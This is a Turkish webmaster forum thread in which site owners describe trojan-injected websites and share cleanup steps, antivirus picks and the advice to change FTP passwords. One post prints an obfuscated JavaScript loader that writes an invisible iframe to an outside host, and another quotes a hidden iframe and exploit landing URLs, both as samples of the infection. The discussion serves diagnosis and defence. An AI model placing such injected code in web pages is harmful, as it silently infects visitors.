İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Sitesine Trojan bulasanlarin dikkatine - StopBadware

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Hayir maalesef temizlemiyor. En azindan benim sistemime bulasmis olanlari temizlememisti.
 

Raiden

0
İyinet Üyesi
Katılım
13 Ocak 2005
Mesajlar
339
Reaction score
0
ben şöyle temizledim. arkadaşlar

bit defender kurdum sonrasında update ettim ve sitelerin bulunduğu dizini taradım

bdc --files /var/www/vhosts > sonuc.txt

sonrasında virus bulaşmış dosyaları buluyor.

elde edilen dosyada virüs bulaşmış dosya satırları var

bunu da

perl -p -i -e "s/silineceksatır/ /g" dosya_yolu şeklinde direk silio

ben böle yaptım.... tabi bunu bulunan tüm satırlar için not defterinde tek tek düzenledim sonra kopyalayıp ssh da yapıştır dedim şakır şakır temizlendi... :)
 

alem

0
İyinet Üyesi
Katılım
9 Ocak 2008
Mesajlar
30
Reaction score
0
wordpress kullanananlar, konuları copy/paste yaparken dikkat etsinler. Kardeşim sitenin birinden bir konuyu kopyalayıp yayınla demiş. Kopyaladıgı yerde iframeli trojan/virüs herneyse googlenin yasaklı site durumuna getirmiş sitesini. Mail attık bekliyoruz şimdi ne zaman kaldıracak uyarısını :)
 

darkness

0
İyinet Üyesi
Katılım
2 Şubat 2006
Mesajlar
168
Reaction score
0
ayni sekilde benimde serverdeki yaklasik 12 sitenin icindeki index dosyalarina java ve php kodlari eklenmisti, sirf ana index sayfalari degil alt klasörlerdeki index dosyalarida ayni sekildeydi, hepsini tek tek sildim yaklasik 6 saatimi aldi tamamen temizlemek.
Sonuc olarak ankadikmi root olarak girilmemis servere bir trojan yardimiyla Cute Ftp nin database dosyasini ele geciriyorlar ve otomatik olarak script atiyorlar indexlere.
Sebebide CUte Ftp nin icindeki bir trojan (crackli kullandigim icin benim hiyarligim).

Ilk olarak makineye format attim ve FTp serveri durdurduktan sonra bütün ftp sifrelerini degistirdim simdilik durum iyi, Cute ftp yi marezden aldiysaniz silin makinenizi trojanlardan temizleyin ve ftp sifrelerinizi degitirin.
 

~Aykut

0
İyinet Üyesi
Katılım
25 Şubat 2005
Mesajlar
84
Reaction score
0
Konum
My Ütopya
aynı sorun bende de var. bilgisayarım sürekli kitleniyordu. en sonunda formatlamak zorunda kaldım. pc yi temizledikten sonra web sitelerime girince virrus uyarıları almaya başladım.


<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>


web sitelerimde her dosyanın içine yukarıdaki kodlar bulaşmış. bu kodlar sadece kaynagı göster dediğimde çıkıyor. pc ye indirdigimde kod kalmıyor.
 

CaNeRiuM

0
İyinet Üyesi
Onaylı Üye
Katılım
10 Mart 2008
Mesajlar
210
Reaction score
2
aynı sorun bende de var. bilgisayarım sürekli kitleniyordu. en sonunda formatlamak zorunda kaldım. pc yi temizledikten sonra web sitelerime girince virrus uyarıları almaya başladım.





web sitelerimde her dosyanın içine yukarıdaki kodlar bulaşmış. bu kodlar sadece kaynagı göster dediğimde çıkıyor. pc ye indirdigimde kod kalmıyor.

bu kodlar gizli down java kodlarıdır kısaca .exe uzantılı downloader kodlarını google görmesin diye javalıyıp sitenize yerleştirmişlerdir ve hitinizi kullanarak sitenize girenlere trojan bulaştırılıyor bu sayede

sitenizin açıklarını kontrol edin yada ettirebilirsiniz genelde açıktan yararlanıp koyarlar bu kodları

yada serverınızda backdoor ( açık kapı ) olabilir server size aitse güvenlik önlemleri alıp bu kodların eklenmemesini sağlıyabilirsiniz
 

atay

0
İyinet Üyesi
Katılım
29 Ekim 2005
Mesajlar
3,592
Reaction score
37
Malesef ki şu anda özellikle trojanları yakalamak çok zor. Normal bir trojan uygulamasını bir antivirüs yakalarken, "packleme" olarak adlandırılan programdan, virusler geçirildikten sonra hiçbir antivirüs yakalayamıyor. Belli bir süre sonra, packten geçirilen virüsleri antivirüsler görmeye başlıyor fakat çoktan yeni ve yakalanmayan bir "packer" çıkmış oluyor. Yapılacak en mantıklı şey dikkatli olmak ve firewall kullanıp bilgisayardan internete erişmek isteyen tüm uygulamalara tek tek izin vermek/vermemek.
 

LaTenT

0
İyinet Üyesi
Katılım
8 Kasım 2005
Mesajlar
717
Reaction score
16
Eğer kodlar sabitse örneğin <?php include 'virusat.php'; ?> şeklinde abit kodlarla bulaşıyorsa perlle program yazıp tüm php/js dosyalarını replace yaptırabilirsiniz. Google'da olacaktı.
 

mircalem

0
İyinet Üyesi
Katılım
30 Ocak 2006
Mesajlar
274
Reaction score
0
06.06.2009 04:22:38 http://bestlitediscover.cn:8080/landig.php?id=4 Adobe Reader 8.1 Reddedildi: bestlitediscover.cn/landig.php* Veritabanları


06.06.2009 04:22:15 http://hugetoplocate.cn:8080/cache/readme.pdf Internet Explorer İşleme Hatası: HEUR:Exploit.Script.Generic

benimde bir kaç siteye index dosyalarına iframe kodu yazmış bu trojan linkleride bunlar.

<iframe src="http://combinebet.cn:8080/index.php" width=139 height=122 style="visibility: hidden"></iframe>
 

GNeRaL

0
İyinet Üyesi
Katılım
24 Şubat 2005
Mesajlar
2,869
Reaction score
16
Konum
Samsun
Eğer sunucu yönetimi sizdeyse tüm dosyaların içeriğinde yer alan ilgili reklamları bash scriptle hazırlanacak ufak bir betikle değiştirebilirsiniz veya silebilirsiniz.
 

GNeRaL

0
İyinet Üyesi
Katılım
24 Şubat 2005
Mesajlar
2,869
Reaction score
16
Konum
Samsun
Şu an elimde örnek bir kod yok. Yalnız daha önceden kaynak sitelerde araştırma yaparken gördüğümden aklımda kalmıştı.
 

TaLiP

0
Yasakli Uye
Katılım
5 Mart 2007
Mesajlar
584
Reaction score
0
yok benim sifrelerde değişmis bir sey yapamıyorum.
Edit:
Bu arada benim siteme bulasan virüste bir site adresi var.

Aynısı başıma gelmişti. index.php yi daha önceki aldığım yedek index.php ile değiştirerek sorunu süzelttim. Bu sorunu tam olarak düzelttiğim anlamına gelmez, ek olarak yapılması gereken ftp giriş bilgilerinin değiştirilmesi. O da kolay fakat böyle bi sorunu tekrar yaşamamak için ne gibi güvenlik önlemi alabiliriz ?
 

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Kaspersky AntiVirus aynı zamanda web ortamında bulunan zararlı kodlara karşıda uyarılarda bulunuyor. Bunu öneririm. Internet Security seçmeye gerek yok yani.
 

osahin

0
İyinet Üyesi
Katılım
8 Ekim 2006
Mesajlar
4,978
Reaction score
34
Konum
kalbinizden :p
Satın alıcam hangisini aliyim ?

Kaspersky Internet Security 2009

Kaspersky Anti-Virus 2009

Kaspersky Mobile Security

Mobile security zaten cep telefonları pda vs. için :p internet security' de dahili firewall, antispam vs. bulunuyor antivirus sadece antivirüs programı bulunuyor, firewall mutlaka bulunmalı bilgisayarınızda önemli bilgiler yer alıyorsa ama standart bir pc kullanıcısıysanız antivirus yeter
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Üst